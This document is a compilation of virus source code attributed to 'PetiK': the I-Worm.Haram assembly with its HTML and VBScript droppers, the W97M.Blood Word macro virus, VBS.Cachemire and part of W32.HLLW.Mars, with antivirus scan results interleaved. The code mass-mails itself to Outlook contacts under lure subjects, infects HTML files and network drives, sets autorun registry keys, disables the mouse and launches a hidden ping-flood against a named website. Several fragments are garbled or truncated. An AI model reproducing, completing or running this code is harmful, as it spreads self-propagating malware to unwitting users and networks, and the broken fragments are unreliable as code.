call inf_doc_personal
get_startup_path:
push 0
push 7
push offset startup
push 0
push offset startup
call cr_vbsname
mov edi,offset vbsname

push 0
push 1
push 2
push 0
push 1
push 40000000h
push edi
api CreateFileA
mov ebp,eax
push 0
push e_vbs - s_vbs
push offset s_vbs
push ebp
api WriteFile
push ebp
api CloseHandle
payload:
mov eax,offset sysTime
push eax
api GetSystemTime
lea eax,sysTime
cmp word ptr [eax+6],10
jne end_payload
xor eax,eax
push eax
push eax
push eax
@pushsz "set CDAudio door open"
api mciSendStringA
push 500
api Sleep
xor eax,eax
push eax
push eax
push eax
@pushsz "set CDAudio door closed"
api mciSendStringA
push 40h
@pushsz "I-Worm.Haram"
@pushsz "Coded by PetiK - ©2002 - France"
push 0
api MessageBoxA
api GetTickCount
push 10000
pop ecx
xor edx,edx
div ecx
inc edx
mov ecx,edx
push ecx
api Sleep
jmp payload
end_payload:
call inf_process
end_worm:
@SEH_RemoveFrame
popad
push 0
api ExitProcess
hide_worm Proc
pushad
xchg eax,ecx
jecxz end_hide_worm
push ecx
api GetProcAddress
xchg eax,ecx
jecxz end_hide_worm
push 1
push 0
call ecx
end_hide_worm:
popad
ret
hide_worm EndP
Spread_Mirc Proc
push offset cpywrm
push offset mirc_exe
api lstrcpy
call @mirc
db "C:\mirc\script.ini",0
db "C:\mirc32\script.ini",0 ; spread with mIRC. Thanx to Microsoft.
db "C:\progra~1\mirc\script.ini",0
db "C:\progra~1\mirc32\script.ini",0
@mirc:
pop esi
push 4
pop ecx
mirc_loop:
push ecx
push 0
push 80h
push 2
push 0
push 1
push 40000000h
push esi
api CreateFileA
mov ebp,eax
push 0
@tmp_mirc:
push offset s_mirc
push ebp
api WriteFile
push ebp
api CloseHandle
@endsz
pop ecx
loop mirc_loop
end_spread_mirc:
ret
Spread_Mirc EndP
inf_doc_personal Proc
pushad
get_personal_folder:
push 0
push 5
push 0
fff_doc:
push offset ffile
@pushsz "*.doc"
api FindFirstFileA
inc eax
je end_f_doc
dec eax
mov [hfind],eax
cr_file:
push offset new_file
api lstrcpy
mov esi,offset new_file
push esi
api lstrlen
add esi,eax
sub esi,4 ; to become \SYSTEM\Wsock32
mov [esi],"mth."
lodsd
push 0
push 1
push 2
push 0
push 1
push 40000000h
push offset new_file
api CreateFileA
mov ebp,eax
push 0
push e_htm - s_htm
push offset s_htm
push ebp
api WriteFile
push ebp
api CloseHandle
fnf_doc:
push offset ffile
push [hfind]
api FindNextFileA
test eax,eax
jne cr_file
push [hfind]
api FindClose
end_f_doc:
popad
ret
inf_doc_personal EndP
inf_process Proc
popad
create_folder:
push 0
@pushsz "C:\backup"
api CreateDirectoryA
@pushsz "C:\backup"
enum_process:
push 0
push 2
api CreateToolhelp32Snapshot
mov lSnapshot,eax
inc eax
je end_inf_process
lea eax,uProcess
mov [eax.dwSize], SIZE PROCESSENTRY32
lea eax,uProcess
push eax
push lSnapshot
api Process32First
check_process:
test eax,eax
jz end_process
push ecx
mov eax,ProcessID
cmp eax,[uProcess.th32ProcessID]
je NextProcess
lea ebx,[uProcess.szExeFile]
push ebx
api lstrcpy
mov edi,offset new_name
push edi
api lstrlen
add edi,eax
mov eax,"mth."
stosd
xor eax,eax
stosd
@pushsz "System.htm"
api lstrcmp
test eax,eax
jz NextProcess
push 0
push 1
push 2
push 0
push 1
push 40000000h
api CreateFileA
mov ebp,eax
push 0
push e_htm - s_htm
push offset s_htm
push ebp
api WriteFile
push ebp
api CloseHandle
NextProcess:
push lSnapshot
api Process32Next
jmp check_process
end_process:
push lSnapshot
api CloseHandle
end_inf_process:
pushad
ret
inf_process EndP
cr_vbsname Proc
mov edi,offset vbsname
; api GetTickCount
push 10
pop ecx
; xor edx,edx
; div ecx
; inc edx
; mov ecx,edx
name_g:
push ecx
api GetTickCount
push '9'-'0'
pop ecx
xor edx,edx
div ecx
xchg eax,edx
add al,'0'
stosb
api GetTickCount
push 100
pop ecx
xor edx,edx
div ecx
push edx
api Sleep
pop ecx
loop name_g
mov eax,"sbv."
stosd
ret
cr_vbsname EndP
.data
ffile WIN32_FIND_DATA <?>
uProcess PROCESSENTRY32 <?>

ProcessID dd ?
lSnapshot dd ?
new_name db 100 dup (?)
orgwrm db 50 dup (0)

cpywrm db 50 dup (0)
msgwrm db 50 dup (0)
startup db 70 dup (0)
new_file db 90 dup (0)
vbsname db 20 dup (0)
byte_write dd ?
hfind dd ?
s_mirc: db "[script]",CRLF
db ";Don't edit this file.",CRLF,CRLF
db "n0=on 1:JOIN:{",CRLF
db "n1= /if ( $nick == $me ) { halt }",CRLF
mirc_exe db 50 dup (?)
db CRLF,"n3=}",0
e_mirc:
s_htm: db '<haram>',CRLF
db '<html><head><title>Windows Media Player</title></head><body>',CRLF
db '<script language=VBScript>',CRLF
db 'MsgBox "Please accept the ActiveX",vbinformation,"Internet Explorer"',CRLF
db 'Set upfkupfk=CreateObject("Scripting.FileSystemObject")',CRLF
db 'Set kupfkvqg=CreateObject("WScript.Shell")',CRLF
db 'If err.number=429 Then',CRLF
db 'kupfkvqg.Run javascript:location.reload()',CRLF
db 'Else',CRLF,CRLF
db 'glvqglvb(upfkupfk.GetSpecialFolder(0))',CRLF
db 'glvqglvb(upfkupfk.GetSpecialFolder(1))',CRLF
db 'glvqglvb(kupfkvqg.SpecialFolders("MyDocuments"))',CRLF
db 'glvqglvb(kupfkvqg.SpecialFolders("Desktop"))',CRLF
db 'glvqglvb(kupfkvqg.SpecialFolders("Favorites"))',CRLF
db 'glvqglvb(kupfkvqg.SpecialFolders("Fonts"))',CRLF
db 'End If',CRLF,CRLF
db 'Function glvqglvb(dir)',CRLF
db 'If upfkupfk.FolderExists(dir) Then',CRLF
db ' Set bbbbbbbb=upfkupfk.GetFolder(dir)',CRLF
db ' Set bbblvqgl=bbbbbbbb.Files',CRLF
db ' For each lvqgvqgl in bbblvqgl',CRLF
db ' lvqglvqr=lcase(upfkupfk.GetExtensionName(lvqgvqgl.Name))',CRLF
db ' If lvqglvqr="htm" or lvqglvqr="html" Then',CRLF
db ' Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False)',CRLF
db ' if rhmwrrhm.ReadLine <> "<haram>" Then',CRLF
db ' rhmwrrhm.Close()',CRLF
db ' Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False)',CRLF
db ' htmorg=rhmwrrhm.ReadAll()',CRLF
db ' Set mwrrhmwr=document.body.createTextRange',CRLF
db ' Set rhmwrrhm=upfkupfk.CreateTextFile(lvqgvqgl.path, True, False)',CRLF
db ' rhmwrrhm.WriteLine "<haram>"',CRLF
db ' rhmwrrhm.Write(htmorg)',CRLF
db ' rhmwrrhm.WriteLine mwrrhmwr.htmltext',CRLF
db ' Else',CRLF
db ' End If',CRLF
db ' End If',CRLF
db ' Next',CRLF
db 'End If',CRLF
db 'End Function',CRLF
db '</script></body></html>',0
e_htm:

db 'Set terqne = CreateObject("Scripting.FileSystemObject")',CRLF
db 'Set qumhzh = CreateObject("WScript.Shell")',CRLF
db 'Set sys = terqne.GetSpecialFolder(1)',CRLF
db 'copyname = sys&"\FunnyGame.exe"',CRLF
db 'Set htgx = CreateObject("Outlook.Application")',CRLF
db 'Set ofcc = htgx.GetNameSpace("MAPI")',CRLF
db 'For each c In ofcc.AddressLists',CRLF
db 'If c.AddressEntries.Count <> 0 Then',CRLF
db 'For d = 1 To c.AddressEntries.Count',CRLF
db 'Set etldb = htgx.CreateItem(0)',CRLF
db 'etldb.To = c.AddressEntries(d).Address',CRLF
db 'etldb.Subject = "New game from the net for you " &
c.AddressEntries(d).Name',CRLF
db 'etldb.Body = "Play at this funny game. It''s very cool !"',CRLF
db 'etldb.Attachments.Add(copyname)',CRLF
db 'etldb.DeleteAfterSubmit = True',CRLF
db 'If etldb.To <> "" Then',CRLF
db 'etldb.Send',CRLF
db 'End If',CRLF
db 'Next',CRLF
db 'End If',CRLF
db 'Next',0
e_vbs:
ends
end start
HARAM.HTM
<haram>
<html><head><title>Windows Media Player</title></head><body>
<script language=VBScript>
MsgBox "Please accept the ActiveX",vbinformation,"Internet Explorer"
Set upfkupfk=CreateObject("Scripting.FileSystemObject")
Set kupfkvqg=CreateObject("WScript.Shell")
If err.number=429 Then
kupfkvqg.Run javascript:location.reload()
Else
glvqglvb(upfkupfk.GetSpecialFolder(0))
glvqglvb(upfkupfk.GetSpecialFolder(1))
glvqglvb(kupfkvqg.SpecialFolders("MyDocuments"))
glvqglvb(kupfkvqg.SpecialFolders("Desktop"))
glvqglvb(kupfkvqg.SpecialFolders("Favorites"))
glvqglvb(kupfkvqg.SpecialFolders("Fonts"))
End If
Function glvqglvb(dir)
If upfkupfk.FolderExists(dir) Then
Set bbbbbbbb=upfkupfk.GetFolder(dir)
Set bbblvqgl=bbbbbbbb.Files
For each lvqgvqgl in bbblvqgl
lvqglvqr=lcase(upfkupfk.GetExtensionName(lvqgvqgl.Name))
If lvqglvqr="htm" or lvqglvqr="html" Then
Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False)
if rhmwrrhm.ReadLine <> "<haram>" Then
rhmwrrhm.Close()
Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False)
htmorg=rhmwrrhm.ReadAll()
rhmwrrhm.Close()
Set mwrrhmwr=document.body.createTextRange
Set rhmwrrhm=upfkupfk.CreateTextFile(lvqgvqgl.path, True, False)
rhmwrrhm.WriteLine "<haram>"
rhmwrrhm.Write(htmorg)
rhmwrrhm.WriteLine mwrrhmwr.htmltext
rhmwrrhm.Close()
Else
rhmwrrhm.Close()
End If
End If
Next
End If
End Function
HARAM.VBS

Set terqne = CreateObject("Scripting.FileSystemObject")
Set qumhzh = CreateObject("WScript.Shell")
Set sys = terqne.GetSpecialFolder(1)
copyname = sys&"\FunnyGame.exe"
Set htgx = CreateObject("Outlook.Application")
Set ofcc = htgx.GetNameSpace("MAPI")
For each c In ofcc.AddressLists
If c.AddressEntries.Count <> 0 Then
For d = 1 To c.AddressEntries.Count
Set etldb = htgx.CreateItem(0)
etldb.To = c.AddressEntries(d).Address
etldb.Subject = "New game from the net for you " & c.AddressEntries(d).Name
etldb.Body = "Play at this funny game. It's very cool !"
etldb.Attachments.Add(copyname)
etldb.DeleteAfterSubmit = True
If etldb.To <> "" Then
etldb.Send
End If
Next
End If
Next
File Haram.exe received on 05.16.2009 11:58:29 (CET)
AntiVir 7.9.0.168 2009.05.15 TR/Navigator.VBS
Authentium 5.1.2.4 2009.05.15 W32/Malware!f42c
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Generic.Malware.SIMbg.1C80A513
ClamAV 0.94.1 2009.05.15 Worm.Funnygame
Comodo 1157 2009.05.08 Worm.Win32.Petik.Haram
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.7680
eTrust-Vet 31.6.6508 2009.05.16 VBS/Rophage.B
F-Prot 4.4.4.56 2009.05.15 W32/Malware!f42c
GData 19 2009.05.16 Generic.Malware.SIMbg.1C80A513
McAfee+Artemis 5616 2009.05.15 Artemis!722436AE8486
McAfee-GW-Edition 6.7.6 2009.05.15 Trojan.Navigator.VBS
Microsoft 1.4602 2009.05.16 Worm:Win32/PetTick.H@mm
NOD32 4080 2009.05.15 Win32/Petik.Haram
Norman 6.01.05 2009.05.16 W32/Petik.AD
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.16 W32/Petik.W.worm
PCTools 4.4.2.0 2009.05.15 I-Worm.Pethar.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Worm.Mail.Win32.Petik
Sophos 4.41.0 2009.05.16 W32/Petik-Y
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 -
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.Petik.5192
VirusBuster 4.6.5.0 2009.05.15 I-Worm.Pethar.A
MD5...: 722436ae848608575bdf5d7036f3d1a9
SHA1..: ca97b2f3ef477f327875b1373f14a34b88b565c6
PEiD..: PEtite v2.2
File Haram.htm received on 05.16.2009 11:58:32 (CET)
a-squared 4.0.0.101 2009.05.16 -
AhnLab-V3 5.0.0.2 2009.05.15 -
AntiVir 7.9.0.168 2009.05.15 VBS/Navigator.2
Antiy-AVL 2.0.3.1 2009.05.15 -
Authentium 5.1.2.4 2009.05.15 VBS/Navigator.A
AVG 8.5.0.336 2009.05.15 VBS/Bother
BitDefender 7.2 2009.05.16 VBS.Navigator.A
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.15 -
Comodo 1157 2009.05.08 -
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 VBS/Rophage.B
F-Prot 4.4.4.56 2009.05.15 VBS/Navigator.A
F-Secure 8.0.14470.0 2009.05.15 Virus.VBS.Navigator
Fortinet 3.117.0.0 2009.05.16 HTML/Vierka.A
GData 19 2009.05.16 VBS.Navigator.A
Ikarus T3.1.1.49.0 2009.05.16 -
K7AntiVirus 7.10.735 2009.05.14 -
Kaspersky 7.0.0.125 2009.05.16 Virus.VBS.Navigator
McAfee 5616 2009.05.15 W32/PetTick
McAfee+Artemis 5616 2009.05.15 W32/PetTick
McAfee-GW-Edition 6.7.6 2009.05.15 Script.Navigator.2
Microsoft 1.4602 2009.05.16 Virus:VBS/Navigator.gen
NOD32 4080 2009.05.15 VBS/Petik
Norman 6.01.05 2009.05.16 VBS/Navigator.F
nProtect 2009.1.8.0 2009.05.16 VBS.Haram.A@mm
Panda 10.0.0.14 2009.05.16 W32/Petik.U.worm
PCTools 4.4.2.0 2009.05.15 VBS.Ngator.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 -
Sophos 4.41.0 2009.05.16 W32/Petik-Y
Sunbelt 3.2.1858.2 2009.05.16 -
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 VBS_PETTICK.Y
VBA32 3.12.10.5 2009.05.16 -
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.15 VBS.Ngator.A
MD5...: b358dde6d08d84cf4571df91509df185
SHA1..: bdec927521e2209aee0783b72b970b2211fb2d51
File Haram.vbs received on 05.16.2009 11:58:35 (CET)
AntiVir 7.9.0.168 2009.05.15 VBS/Navigator.1
Antiy-AVL 2.0.3.1 2009.05.15 -
Authentium 5.1.2.4 2009.05.15 Heuristic-31
AVG 8.5.0.336 2009.05.15 VBS/Randa
BitDefender 7.2 2009.05.16 Generic.ScriptWorm.D5290353
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.15 -
Comodo 1157 2009.05.08 -
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 VBS/Mailworm1
F-Prot 4.4.4.56 2009.05.15 Heuristic-31
Fortinet 3.117.0.0 2009.05.16 VBS/Pica.X@mm
GData 19 2009.05.16 Generic.ScriptWorm.D5290353
K7AntiVirus 7.10.735 2009.05.14 VBS.Generic.MassMailer
McAfee 5616 2009.05.15 W32/PetTick.vbs
McAfee+Artemis 5616 2009.05.15 W32/PetTick.vbs
McAfee-GW-Edition 6.7.6 2009.05.15 Script.Navigator.1
Microsoft 1.4602 2009.05.16 Virus:VBS/Petik.Y
Norman 6.01.05 2009.05.16 -
nProtect 2009.1.8.0 2009.05.16 VBS.Haram.A@mm
Panda 10.0.0.14 2009.05.16 -
PCTools 4.4.2.0 2009.05.15 VBS.Pethar.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 VBS.I-Worm.Lee-Based
Sophos 4.41.0 2009.05.16 W32/Petik-Y
Sunbelt 3.2.1858.2 2009.05.16 -
TheHacker 6.3.4.1.326 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.15 VBS.Pethar.A
MD5...: 0316dbe5df244e6a4fc18ce96e7b3907
SHA1..: 1fea896705358384a6889d1a223f1416b2880902
' Name : W97M.Blood
' Author : PetiK
' Size : 2701 byte
'
'
'
'
' Macro AutoOpen : Disabled all protection against virus. Create
' \WINDOWS\blood.sys and put the macro code. If not exist the Blood
' key in the Windows key of regedit, W97M.Blood infects “NORMAL.DOT”.
' If the current day is the 15th it alters the name of the owner and
' the organization by “BloodMan” and “PetiK Corporation”.
'
' Macro HelpAbout : It displayas a balloon message.
'
' Macro ViewVBCode : Adds value in the run key to disabled the mouse
' and displays a message box.
'
' Macro AutoClose : It shoes a message box. After it calls two
' others macro.
' Macro PetiK : Create folder \WINDOWS\Blood and put the file
' TitleBlood.txt.
' Macro Attak : It pings the fucking web site of “Front National”.
' It’s a DoS attack.
Attribute VB_Name = "Blood"

Sub AutoOpen()
With Options
End With
DropFile = win & "\blood.sys"
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Blood\", "InfectDot") <> "OK" Then
Doc("Blood").Export DropFile
Nor.Import DropFile
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Blood\", "InfectDot") = "OK"
End If
If Doc.Item("Blood").Name <> "Blood" Then
Nor("Blood").Export DropFile
Doc.Import DropFile
ActiveDocument.Save
End If
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "RegisteredOwner") =
"BloodMan"
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\",
"RegisteredOrganization") = "PetiK Corporation"
End If
End Sub
Sub HelpAbout()
.Visible = True
End With
.Text = "W97M.Blood.A coded by PetiK (c)2001"
.Heading = "W97M.Blood"
.Show
End With
End Sub
Sub ViewVBCode()
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\", "Blood1") =
"rundll32 mouse,disable"
MsgBox "Your computer is dead." + vbCr + "Don't stop your machine", vbCritical,
"W97M.Blood"
End Sub
Sub AutoClose()
MsgBox "PetiK vous souhaite une très bonne journée", vbExclamation, "W97M.Blood"
Call PetiK
Call Attak
End Sub
Sub PetiK()
FileSystem.MkDir win & "\Blood"
Open win & "\Blood\TitleBlood.txt" For Output As #1
Print #1, "For the new Macro Virus W97M.Blood by PetiK"
Print #1, ""
Print #1, "Hi " & Application.UserName & ","
Print #1, "How do you do ?"
Print #1, "Your computer is infected by Blood"
Print #1, "It's not a dangerous macro."
Print #1, " Bye. PetiK"
Close #1
FileSystem.SetAttr win & "\Blood\TitleBlood.txt", vbReadOnly
End Sub
Sub Attak()
Shell "ping -l 5000 -t www.front-national.fr", vbHide
Shell "ping -l 5000 -t front-national.fr", vbHide
End Sub
File Blood.doc received on 05.16.2009 10:45:39 (CET)
a-squared 4.0.0.101 2009.05.16 Virus.MSWord.Petman.A!IK
AhnLab-V3 5.0.0.2 2009.05.15 -
AntiVir 7.9.0.168 2009.05.15 W2000M/Petman.A
Authentium 5.1.2.4 2009.05.15 W97M/Petman.A
Avast 4.8.1335.0 2009.05.15 MW97:Petman-A
AVG 8.5.0.336 2009.05.15 W97M/Petman
BitDefender 7.2 2009.05.16 W97M.Petman.A
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.15 WM.Pivis
Comodo 1157 2009.05.08 Virus.MSWord.Petik
DrWeb 5.0.0.12182 2009.05.16 W97M.Petik
eSafe 7.0.17.0 2009.05.14 O97M.GNtp
eTrust-Vet 31.6.6508 2009.05.16 W97M/Petman.A
F-Prot 4.4.4.56 2009.05.15 W97M/Petman.A
F-Secure 8.0.14470.0 2009.05.15 Virus.MSWord.Petik
Fortinet 3.117.0.0 2009.05.16 W97M/Petman.A
GData 19 2009.05.16 W97M.Petman.A
Ikarus T3.1.1.49.0 2009.05.16 Virus.MSWord.Petman.A
K7AntiVirus 7.10.735 2009.05.14 Macro.Petik
Kaspersky 7.0.0.125 2009.05.16 Virus.MSWord.Petik
McAfee-GW-Edition 6.7.6 2009.05.15 Macro.Petman.A
Microsoft 1.4602 2009.05.16 Virus:W97M/Petman.A
NOD32 4080 2009.05.15 W97M/Petman.A
Norman 6.01.05 2009.05.16 W97M/Petman.A
nProtect 2009.1.8.0 2009.05.16 W97M.Petman.A
Panda 10.0.0.14 2009.05.15 W97M/Kodak.worm
PCTools 4.4.2.0 2009.05.15 WORD.97.Petik.M
Prevx 3.0 2009.05.16 -
Rising 21.29.51.00 2009.05.16 Macro.Word97.Petik
Sophos 4.41.0 2009.05.16 WM97/Dool-A
Sunbelt 3.2.1858.2 2009.05.16 Virus.MSWord.Petik (v)
Symantec 1.4.4.12 2009.05.16 W97M.Pet_Tick.Intd
TrendMicro 8.950.0.1092 2009.05.15 W97M_PETMAN.A
VBA32 3.12.10.5 2009.05.16 Virus.W97M.Blood
ViRobot 2009.5.15.1737 2009.05.15 W97M.Petman.A
VirusBuster 4.6.5.0 2009.05.15 WORD.97.Petik.M
MD5...: 8cd23603a72f1dcbdf22e03d49c17f83
SHA1..: f970fea6b876ba8d133900ceb55a14bf0c307335
' Name : VBS.Cachemire
' Author : PetiK
' Language : VBS
' Date : 19/06/2002
On error resume next
fs="FileSystemObject"
sc="Scripting"
wsc="WScript"
sh="Shell"
nt="Network"
crlf=Chr(13)&Chr(10)
Set fso=CreateObject(sc & "." & fs)

Set ws=CreateObject(wsc & "." & sh)
Set ntw=CreateObject(wsc & "." & nt)
desk=ws.SpecialFolders("Desktop")
strp=ws.SpecialFolders("StartUp")
Set fl=fso.OpenTextFile(WScript.ScriptFullName,1)
wrm=fl.ReadAll
fl.Close
If WScript.ScriptFullName <> sys&"\MsBackup.vbs" Then

MsgBox "Sorry but the file """ & WScript.ScriptName & """ is not a valid VBS
file",vbcritical,"ALERT"
fso.GetFile(WScript.ScriptFullName).Copy(sys&"\MsBackup.vbs")
'ws.RegWrite
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MsBackup",sys&"\MsBackup.vbs"
netn=""
For cnt = 1 To 8
netn=netn & Chr(Int(Rnd(1) * 26) + 97)
Next
netn = netn & ".vbs"
msgbox netn
Loop
spreadnetwrk(netn)
set lnk = ws.CreateShortcut(desk & "\Surprise.lnk")

lnk.TargetPath = sys&"\MsBackup.vbs"
lnk.WindowStyle = 1
lnk.Hotkey = "CTRL+SHIFT+F"
lnk.IconLocation = "wscript.exe, 0"
lnk.Description = "Surprise"
lnk.WorkingDirectory = sys
lnk.Save
Else
y=0
Do Until y=Day(Now)
Sub spreadout()
y=y+1
Loop
If Day(Now) = Int((31 * Rnd) + 1) Then
ws.Run "notepad.exe"
wscript.Sleep 200
ws.SendKeys "Date : " & date & vbLf
ws.SendKeys "Time : " & time & crlf
x = 0
Do Until x=6
num = Int((6 * Rnd) + 1)
If num = 1 Then
mess = "You're infected by my new VBS virus. " & VbLf & "Don't panic, it's not Dangerous"
& vbCrlf
ElseIf num = 2 Then mess = "Why do you click unknown file ??" & crlf
ElseIf num = 3 Then mess = "A new creation coded by PetiK/[b8]" & crlf
ElseIf num = 4 Then mess = "Contact an AV support to disinfect your system" & crlf
ElseIf num = 5 Then mess = "Be careful next time" & crlf
ElseIf num = 6 Then mess = "Curiosity is bad" & crlf
End If
For i = 1 to Len(mess)
ws.SendKeys Mid(mess,i,1)
wscript.Sleep 50
Next
x=x+1
Loop
End If
End If
Sub spreadnetwrk(nname)
Set drve = ntw.EnumNetworkDrives
If drve.Count > 0 Then
For j = 0 To drve.Count -1
If drve.Item(j) <> "" Then
fso.GetFile(WScript.ScriptFullName).Copy(drve.Item(j) & "\" & nname)
End If
Next
End If
End Sub
Sub spreadout()
F.To=E.Address
F.Subject="Backup your system..."
F.Body="Use this tool to create a backup of your system..."
F.Attachments.Add(sys&"\MsBackup.vbs")
If F.To <> "" Then
F.Send
End If
Next
End If
Next
End Sub
File Cachemire.vbs received on 05.16.2009 11:21:06 (CET)

AhnLab-V3 5.0.0.2 2009.05.15 VBS/Petik.C
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.L
Authentium 5.1.2.4 2009.05.15 VBS/Petik.I@mm
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Generic.ScriptWorm.91D6A07B
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.15 Worm.Petik.l
Comodo 1157 2009.05.08 Worm.Win32.Petik.l
eSafe 7.0.17.0 2009.05.14 VBS.MailSender.
eTrust-Vet 31.6.6508 2009.05.16 VBS/SSIWG2
F-Prot 4.4.4.56 2009.05.15 VBS/Petik.I@mm
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik.l
Fortinet 3.117.0.0 2009.05.16 VBS/Petik.L@mm
GData 19 2009.05.16 Generic.ScriptWorm.91D6A07B
K7AntiVirus 7.10.735 2009.05.14 -
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik.l
McAfee 5616 2009.05.15 VBS/Pica.worm.gen
McAfee+Artemis 5616 2009.05.15 VBS/Pica.worm.gen
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.L
Microsoft 1.4602 2009.05.16 Virus:VBS/Emire
nProtect 2009.1.8.0 2009.05.16 VBS.Petchem.A
PCTools 4.4.2.0 2009.05.15 VBS.Petchem.A
Prevx 3.0 2009.05.16 -
Sophos 4.41.0 2009.05.16 VBS/Pica-G
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 VBS.Camire.Int
TheHacker 6.3.4.1.326 2009.05.15 VBS/Mass.worm.gen
TrendMicro 8.950.0.1092 2009.05.15 VBS_PICA.GEN
VBA32 3.12.10.5 2009.05.16 Email-Worm.Win32.Petik.l
MD5...: 175dbf33282ed471b62d616be435a03f
SHA1..: 8d0a9298ab3af4827f47a90e3fbbe7073e5a9376
' Name : W32.HLLW.Mars
' Author : PetiK
' Date : 20/06/2002
'
'
'
'
Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA"
(ByVal lpBuffer As String, ByVal nSize As Long) As Long
Private Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA"
(ByVal lpBuffer As String, ByVal nSize As Long) As Long
Private Declare Function InternetGetConnectedState Lib "wininet.dll" (ByRef lpdwFlags As
Long, ByVal dwReserved As Long) As Long
Private Declare Function InternetOpen Lib "wininet" Alias "InternetOpenA" (ByVal sAgent
As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As
String, ByVal lFlags As Long) As Long
Private Declare Function InternetCloseHandle Lib "wininet" (ByVal hInet As Long) As
Integer
Private Declare Function InternetReadFile Lib "wininet" (ByVal hFile As Long, ByVal
sBuffer As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Private Declare Function InternetOpenUrl Lib "wininet" Alias "InternetOpenUrlA" (ByVal
hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal
dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
Private Declare Function SetCurrentDirectory Lib "kernel32" Alias "SetCurrentDirectoryA"
(ByVal lpPathName As String) As Long
Private Declare Function SHGetSpecialFolderLocation Lib "shell32.dll" (ByVal hwndOwner As
Long, ByVal nFolder As Long, pidl As ITEMIDLIST) As Long
Private Declare Function SHGetPathFromIDList Lib "shell32.dll" Alias
"SHGetPathFromIDListA" (ByVal pidl As Long, ByVal pszPath As String) As Long
Public sysDir As String
Public winDir As String
Public orig As String
Public cop As String
Const CSIDL_STARTUP = &H7
Private Type SHITEMID
cb As Long
abID As Byte
End Type
Private Type ITEMIDLIST
mkid As SHITEMID
End Type
Sub Main()
Dim sp, ext(1 To 9) As String, exts
ext(1) = "index.htm"
ext(2) = "index.html"
ext(3) = "index.asp"
ext(4) = "default.htm"
ext(5) = "default.html"
ext(6) = "default.asp"
ext(7) = "main.htm"
ext(8) = "main.html"
ext(9) = "main.asp"
sysDir = Space(500)
sysDir = Left(sysDir, GetSystemDirectory(sysDir, Len(sysDir)))
winDir = Space(500)
winDir = Left(sysDir, GetWindowsDirectory(winDir, Len(winDir)))
Call Install
Call VbsDrop
Call InfectExe(sysDir)
Call InfectExe(winDir)
checkconnect:
If InternetGetConnectedState(0&, 0&) = 0 Then GoTo checkconnect
sp = ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\Main\Start Page")

If Len(sp) <> 0 Then
If Right(sp, 1) = "/" Then
For i = 1 To 9
Call srchmail(sp & ext(i))
Next i
ElseIf Right(sp, 4) <> ".htm" And Right(sp, 5) <> ".html" Then
For i = 1 To 9
Call srchmail(sp & "/" & ext(i))
Next i
Else
End If
End If
End Sub
Sub Install()
FileCopy orig, sysDir & "\DebugW32.exe"
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Debug", sysDir &
"\DebugW32.exe"
End Sub
Private Function GetSpecialfolder(CSIDL As Long) As String

Dim r As Long
Dim IDL As ITEMIDLIST
r = SHGetSpecialFolderLocation(100, CSIDL, IDL)
If r = NOERROR Then
Path$ = Space$(512)
r = SHGetPathFromIDList(ByVal IDL.mkid.cb, ByVal Path$)
GetSpecialfolder = Left$(Path, InStr(Path, Chr$(0)) - 1)
Exit Function
End If
GetSpecialfolder = ""
End Function
Sub VbsDrop()
Dim lngbufferlen
Dim bbyte As Byte
Dim pefile As String
vbfle = GetSpecialfolder(CSIDL_STARTUP) & "\start.vbs"
Open orig For Binary As #1

DoEvents
Do While Not EOF(1)
DoEvents
Get #1, , bbyte
e = Hex(bbyte)
If Len(e) = 1 Then e = "0" & Hex(bbyte)
pefile = pefile & e
Loop
Close #1
vbsf = "'Mars" & vbCrLf & _

"On Error Resume Next" & vbCrLf & _
"Set fso=CreateObject(""Scripting.FilesystemObject"")" & vbCrLf & _
